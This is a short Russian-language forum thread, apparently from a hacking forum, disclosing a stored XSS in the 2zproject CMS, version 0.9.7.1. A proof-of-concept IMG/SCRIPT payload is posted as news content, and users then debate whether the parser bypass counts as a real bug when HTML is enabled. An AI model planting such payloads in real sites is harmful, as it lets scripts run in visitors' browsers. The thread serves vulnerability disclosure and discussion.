2zproject

[HACKERSMARSA]

Движок: 2zproject
Версия: 0.9.7.1(последняя вроде)
Уязвимость: XSS(активка)
Применение: Добавляем новость с содержанием:

Код:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

p.s Должно быть включенное HTML

[M@ZAX@KEP]

Цитата:

p.s Должно быть включенное HTML

Вот это настораживает... HTML должен админ включать?

[HACKERSMARSA]

Цитата:

Сообщение от M@ZAX@KEP

Вот это настораживает... HTML должен админ включать?

Да,по дефолту отключенно

[M@ZAX@KEP]

Забавно, но так можно сразу писать, что XSS есть на всех сайтах Ucoz и форумах Vbulletin, например. Там тоже html в сообщениях отключен по дефолту, но админ может дать право использовать его некоторым группам пользователей.

[mr.The]

Цитата:

Сообщение от M@ZAX@KEP

Забавно, но так можно сразу писать, что XSS есть на всех сайтах Ucoz и форумах Vbulletin, например. Там тоже html в сообщениях отключен по дефолту, но админ может дать право использовать его некоторым группам пользователей.

Нет же. В булке и прочих стоит парсер, который обрезает левые теги и всякий мусор. Есть куча багов основанных на том, что парсер - лох. И этот - в их числе. Баг же не в том, что можно просто вставить "<SCRIPT>alert("XSS")</SCRIPT>", а в том, что вставлять его надо в картинку. Это простейший вариант, вот тут, например, чуть сложнее. Ну или вспомни xss в твитере: https://rdot.org/forum/showthread.php?t=728

[M@ZAX@KEP]

Извините тогда, не знал, что разрешение html в VBulletin всё равно будет неполным.